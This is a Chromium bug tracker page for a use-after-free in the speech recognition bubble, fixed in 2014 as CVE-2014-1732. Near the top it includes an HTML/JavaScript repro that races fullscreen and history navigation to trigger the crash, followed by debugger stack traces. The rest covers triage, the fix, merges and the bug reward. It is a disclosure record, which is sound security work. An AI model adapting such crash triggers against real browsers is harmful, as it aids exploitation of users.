New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Email to this user bounced
Closed: Apr 2014
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 1
Type: Bug-Security
wip



Sign in to add a comment
link

Issue 352851: Security: UaF in SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl

Reported by chromium...@gmail.com, Mar 15 2014

Issue description

VERSION
Chrome Version : 35.0.1892.2 canary
Operating System: Windows XP

REPRO FILE:

<input onclick="setTimeout('test()',500)" x-webkit-speech />
<script>
function test()
{
	if (document.documentElement.webkitRequestFullScreen) {
		document.documentElement.webkitRequestFullScreen();
	}
document.addEventListener("webkitfullscreenchange", function () {   history.go(-1)}, true);

}
</script>
<script defer=defer>
if(history.length==1){
	setTimeout('window.location = document.location + "?new"',10);
}
</script>


Crash State: 
012fa78 02fa4583 chrome_1c50000!`anonymous namespace'::SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl+0x1c [c:\b\build\slave\win\build\src\chrome\browser\ui\views\speech_recognition_bubble_views.cc @ 362]
0012fa84 025bc2a2 chrome_1c50000!`anonymous namespace'::SpeechRecognitionBubbleImpl::`scalar deleting destructor'+0xb
0012fac4 01cfdd91 chrome_1c50000!speech::SpeechRecognitionBubbleController::ProcessRequestInUiThread+0xab [c:\b\build\slave\win\build\src\chrome\browser\speech\speech_recognition_bubble_controller.cc @ 199]
0012fad4 01cb0f9c chrome_1c50000!base::internal::Invoker<2,base::internal::BindState<base::internal::RunnableAdapter<bool (__thiscall history::ShortcutsDatabase::*)(std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>,void __cdecl(history::ShortcutsDatabase *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &),void __cdecl(history::ShortcutsDatabase *,std::basic_string<char,std::char_traits<char>,std::allocator<char> >)>,void __cdecl(history::ShortcutsDatabase *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>::Run+0x16 [c:\b\build\slave\win\build\src\base\bind_internal.h @ 1253]
0012fb6c 01caff4d chrome_1c50000!base::MessageLoop::RunTask+0x29d [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 451]
0012fcb0 01d2c55b chrome_1c50000!base::MessageLoop::DoWork+0x367 [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 576]
0012fcdc 01cafa12 chrome_1c50000!base::MessagePumpForUI::DoRunLoop+0x5f [c:\b\build\slave\win\build\src\base\message_loop\message_pump_win.cc @ 219]
0012fd84 01ecf92d chrome_1c50000!base::MessageLoop::StartHistogrammer+0xa7 [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 545]
0012fd98 01ecf8f5 chrome_1c50000!content::BrowserMainLoop::RunMainMessageLoopParts+0x2d [c:\b\build\slave\win\build\src\content\browser\browser_main_loop.cc @ 723]
0012fda8 01c705d4 chrome_1c50000!content::BrowserMainRunnerImpl::Run+0x13 [c:\b\build\slave\win\build\src\content\browser\browser_main_runner.cc @ 118]
0012fdd8 01c703bb chrome_1c50000!content::BrowserMain+0x83 [c:\b\build\slave\win\build\src\content\browser\browser_main.cc @ 26]
0012fdec 01c70337 chrome_1c50000!content::RunNamedProcessTypeMain+0x61 [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 466]
0012fe50 01c5c89a chrome_1c50000!content::ContentMainRunnerImpl::Run+0x64 [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 779]
0012fe60 01c5c2d4 chrome_1c50000!content::ContentMain+0x23 [c:\b\build\slave\win\build\src\content\app\content_main.cc @ 19]
0012fea0 00427c91 chrome_1c50000!ChromeMain+0x3e [c:\b\build\slave\win\build\src\chrome\app\chrome_main.cc @ 49]
0012ff30 004276bc chrome!MainDllLoader::Launch+0x15f [c:\b\build\slave\win\build\src\chrome\app\client_util.cc @ 315]
0012ff74 00449ac5 chrome!wWinMain+0x50 [c:\b\build\slave\win\build\src\chrome\app\chrome_exe_main_win.cc @ 103]
 

Comment 1 by chromium...@gmail.com, Mar 15 2014

Speech API Crash Video.avi
3.2 MB Download

Comment 2 by infe...@chromium.org, Mar 17 2014

What are the repro steps ? Does it need user interaction like mouse click, etc?

Comment 3 by chromium...@gmail.com, Mar 17 2014

inferno@ There are no steps to repro, just click on the Speech.

Comment 4 by chromium...@gmail.com, Mar 17 2014

This crash can take several tries to repro.

Comment 5 by ClusterFuzz, Mar 18 2014

Project Member
Labels: Cr-Blink-Speech Owner-Triage Untriaged-1
Owner: tommyw@chromium.org
Status: Assigned
tommyw@: Can you please take a look or find someone else to own it.

- Your friendly ClusterFuzz

Comment 6 by ClusterFuzz, Mar 18 2014

Project Member
Labels: Missing_Severity-1 Missing_Impact-1

Comment 7 by rsesek@chromium.org, Mar 18 2014

khalil: Based on the version in which you reported this, I don't think this was fixed by  bug 330660 .

Were you able to reproduce this on either the stable or beta versions of Chrome (which include fixes for that bug, too)?

Comment 8 by chromium...@gmail.com, Mar 18 2014

rsesek@: Yes, I can reproduce this bug on the latest version of canary (35.0.1897.2) and stable (33.0.1750.154 ), but only on my slowly machine (Windows XP).

Comment 9 by chromium...@gmail.com, Mar 18 2014

I've recorded a demo showing how I repro this crash on canary http://youtu.be/yR3i805Irmw

Comment 10 by chromium...@gmail.com, Mar 19 2014

eax=f9559fe6 ebx=00000000 ecx=06aa6700 edx=035bf840 esi=05e24660 edi=01105ea0
eip=0290f59a esp=0012f97c ebp=0012f988 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
chrome_1c30000!`anonymous namespace'::SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl+0x1c:
0290f59a ff5074          call    dword ptr [eax+74h]  ds:0023:f955a05a=????????
0:000> k
  *** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr  
0012f97c 0290f969 chrome_1c30000!`anonymous namespace'::SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl+0x1c [c:\b\build\slave\win\build\src\chrome\browser\ui\views\speech_recognition_bubble_views.cc @ 351]
0012f988 022e98a7 chrome_1c30000!`anonymous namespace'::SpeechRecognitionBubbleImpl::`scalar deleting destructor'+0xb
0012f9c4 01cc78f6 chrome_1c30000!speech::SpeechRecognitionBubbleController::ProcessRequestInUiThread+0xa8 [c:\b\build\slave\win\build\src\chrome\browser\speech\speech_recognition_bubble_controller.cc @ 200]
0012f9d4 01c88985 chrome_1c30000!base::internal::Invoker<2,base::internal::BindState<base::internal::RunnableAdapter<void (__thiscall invalidation::InvalidationClientImpl::*)(invalidation::ObjectId const &)>,void __cdecl(invalidation::InvalidationClientImpl *,invalidation::ObjectId const &),void __cdecl(base::internal::UnretainedWrapper<invalidation::InvalidationClientImpl>,invalidation::ObjectId)>,void __cdecl(invalidation::InvalidationClientImpl *,invalidation::ObjectId const &)>::Run+0x16 [c:\b\build\slave\win\build\src\base\bind_internal.h @ 1253]
0012faa0 01c88029 chrome_1c30000!base::MessageLoop::RunTask+0x56d [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 513]
0012fbf0 01cf536d chrome_1c30000!base::MessageLoop::DoWork+0x301 [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 638]
0012fc1c 01ca4c53 chrome_1c30000!base::MessagePumpForUI::DoRunLoop+0x5c [c:\b\build\slave\win\build\src\base\message_loop\message_pump_win.cc @ 219]
0012fcc0 01ec26e4 chrome_1c30000!PrefService::SetUserPrefValue+0xd9 [c:\b\build\slave\win\build\src\base\prefs\pref_service.cc @ 455]
0012fcd4 01ec26ae chrome_1c30000!content::BrowserMainLoop::RunMainMessageLoopParts+0x2d [c:\b\build\slave\win\build\src\content\browser\browser_main_loop.cc @ 730]
0012fce4 01c4ea8a chrome_1c30000!content::BrowserMainRunnerImpl::Run+0x13 [c:\b\build\slave\win\build\src\content\browser\browser_main_runner.cc @ 123]
0012fd1c 01c4e862 chrome_1c30000!content::BrowserMain+0x99 [c:\b\build\slave\win\build\src\content\browser\browser_main.cc @ 26]
0012fd30 01c4e7e4 chrome_1c30000!content::RunNamedProcessTypeMain+0x5d [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 472]
0012fd9c 01c3aa9b chrome_1c30000!content::ContentMainRunnerImpl::Run+0x85 [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 791]
0012fdac 01c3a4e0 chrome_1c30000!content::ContentMain+0x29 [c:\b\build\slave\win\build\src\content\app\content_main.cc @ 35]
0012fde4 00428677 chrome_1c30000!ChromeMain+0x2b [c:\b\build\slave\win\build\src\chrome\app\chrome_main.cc @ 34]
0012fe84 004288d3 chrome!MainDllLoader::Launch+0x161 [c:\b\build\slave\win\build\src\chrome\app\client_util.cc @ 301]
0012fee8 00428956 chrome!`anonymous namespace'::RunChrome+0xd7 [c:\b\build\slave\win\build\src\chrome\app\chrome_exe_main_win.cc @ 68]
0012ff30 00447e9f chrome!wWinMain+0x6c [c:\b\build\slave\win\build\src\chrome\app\chrome_exe_main_win.cc @ 139]
0012ffc0 7c817067 chrome!__tmainCRTStartup+0x11a [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 275]

Comment 11 by rsesek@chromium.org, Mar 19 2014

Labels: -Untriaged-1 -Missing_Severity-1 -Missing_Impact-1 Security_Severity-Medium Security_Impact-Beta Security_Impact-Stable OS-Windows
Thanks. I was not able to reproduce this on OS X, FWIW. This bug is similar in nature to  bug 330660  but does require a small amount of user interaction (have to click the speech mic icon), so I'm going to do an initial Severity of Medium.

Comment 12 by ClusterFuzz, Mar 20 2014

Project Member
Labels: Pri-1

Comment 13 by ClusterFuzz, Mar 26 2014

Project Member
Labels: Nag
tommyw@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz

Comment 14 by tommyw@chromium.org, Mar 26 2014

Labels: -Nag WIP

Comment 15 by bugdroid1@chromium.org, Apr 4 2014

Project Member
------------------------------------------------------------------
r261737 | tommyw@chromium.org | 2014-04-04T13:48:25.464526Z

Changed paths:
   M http://src.chromium.org/viewvc/chrome/trunk/src/chrome/browser/ui/views/speech_recognition_bubble_views.cc?r1=261737&r2=261736&pathrev=261737

Fixing a lifetime issue for Speech Recognition Bubble
It seems that on a slow XP machine the view can be deleted before the
Impl. Fixed by a simple observer pattern.

BUG= 352851 

Review URL: https://codereview.chromium.org/213153002
-----------------------------------------------------------------

Comment 16 by infe...@chromium.org, Apr 4 2014

Status: Fixed

Comment 17 by ClusterFuzz, Apr 4 2014

Project Member
Labels: -Restrict-View-SecurityTeam Merge-Triage Restrict-View-SecurityNotify M-35 M-34
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 18 by chromium...@gmail.com, Apr 8 2014

Is this report qualified for a reward?

Comment 19 by infe...@chromium.org, Apr 8 2014

Labels: reward-topanel
Chromium.Khalil@, we automatically add reward-topanel label when we are near a release. This is a recently fixed bug, please be patient.

Comment 20 by timwillis@chromium.org, Apr 17 2014

Labels: -Merge-Triage Merge-Approved Merge-Requested
Merge-Approved for M34 (via dxie@)

Merge-Requested for M35.

Comment 21 by infe...@chromium.org, Apr 17 2014

Labels: -Merge-Approved merge-merged-1847 Release-1-M34
merged to m34 in r264644

Comment 22 by bugdroid1@chromium.org, Apr 17 2014

Project Member
------------------------------------------------------------------
r264644 | inferno@chromium.org | 2014-04-17T21:32:45.778846Z

Changed paths:
   M http://src.chromium.org/viewvc/chrome/branches/1847/src/chrome/browser/ui/views/speech_recognition_bubble_views.cc?r1=264644&r2=264643&pathrev=264644

Merge 261737 "Fixing a lifetime issue for Speech Recognition Bubble"

> Fixing a lifetime issue for Speech Recognition Bubble
> It seems that on a slow XP machine the view can be deleted before the
> Impl. Fixed by a simple observer pattern.
> 
> BUG= 352851 
> 
> Review URL: https://codereview.chromium.org/213153002

TBR=tommyw@chromium.org

Review URL: https://codereview.chromium.org/240223010
-----------------------------------------------------------------

Comment 23 by timwillis@chromium.org, Apr 17 2014

Merge-Requested for M35.

Comment 24 by kareng@google.com, Apr 21 2014

let's bake a bit more.

Comment 25 by kareng@google.com, Apr 21 2014

Labels: -Merge-Requested Merge-Approved
ah nm i saw the wrong merge.

Comment 26 by timwillis@chromium.org, Apr 22 2014

Tommy - please merge into M35 (branch 1916).

Comment 27 by kenrb@chromium.org, Apr 24 2014

 Issue 348430  has been merged into this issue.

Comment 28 by infe...@chromium.org, Apr 25 2014

Labels: -Merge-Approved Merge-Merged
We forgot to remove m34 label.

Dev not responding to merge request, i merged to m35 in r266126

Comment 29 by bugdroid1@chromium.org, Apr 25 2014

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/3e1316a8675b9e6e1047698d32da41ea8642a9d5

commit 3e1316a8675b9e6e1047698d32da41ea8642a9d5
Author: inferno@chromium.org <inferno@chromium.org@0039d316-1c4b-4281-b951-d872f2087c98>
Date: Fri Apr 25 04:03:48 2014 +0000

Merge 261737 "Fixing a lifetime issue for Speech Recognition Bubble"

> Fixing a lifetime issue for Speech Recognition Bubble
> It seems that on a slow XP machine the view can be deleted before the
> Impl. Fixed by a simple observer pattern.
> 
> BUG= 352851 
> 
> Review URL: https://codereview.chromium.org/213153002

TBR=tommyw@chromium.org

Review URL: https://codereview.chromium.org/254773002

git-svn-id: svn://svn.chromium.org/chrome/branches/1916/src@266126 0039d316-1c4b-4281-b951-d872f2087c98

Comment 30 by bugdroid1@chromium.org, Apr 25 2014

Project Member
Labels: merge-merged-1916
------------------------------------------------------------------
r266126 | inferno@chromium.org | 2014-04-25T04:03:48.174336Z

Changed paths:
   M http://src.chromium.org/viewvc/chrome/branches/1916/src/chrome/browser/ui/views/speech_recognition_bubble_views.cc?r1=266126&r2=266125&pathrev=266126

Merge 261737 "Fixing a lifetime issue for Speech Recognition Bubble"

> Fixing a lifetime issue for Speech Recognition Bubble
> It seems that on a slow XP machine the view can be deleted before the
> Impl. Fixed by a simple observer pattern.
> 
> BUG= 352851 
> 
> Review URL: https://codereview.chromium.org/213153002

TBR=tommyw@chromium.org

Review URL: https://codereview.chromium.org/254773002
-----------------------------------------------------------------

Comment 31 by timwillis@chromium.org, Apr 26 2014

Labels: -reward-topanel reward-1000 reward-unpaid CVE-2014-1732
Congrats - $1000 for this one.

Comment 32 by chromium...@gmail.com, Apr 26 2014

Oh sounds good, thanks!

Comment 33 by ClusterFuzz, Jul 11 2014

Project Member
Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.

Comment 34 by timwillis@chromium.org, Jul 22 2014

Labels: -reward-unpaid reward-inprocess

Comment 35 by timwillis@chromium.org, Sep 6 2014

Labels: -reward-inprocess
Processing via our e-payment system can take a few weeks, but reward should be on its way to you. Thanks again for your help!

Comment 36 Deleted

Comment 37 by ClusterFuzz, Feb 2 2016

Project Member
Labels: -Security_Impact-Beta

Comment 38 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 39 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 40 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 41 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment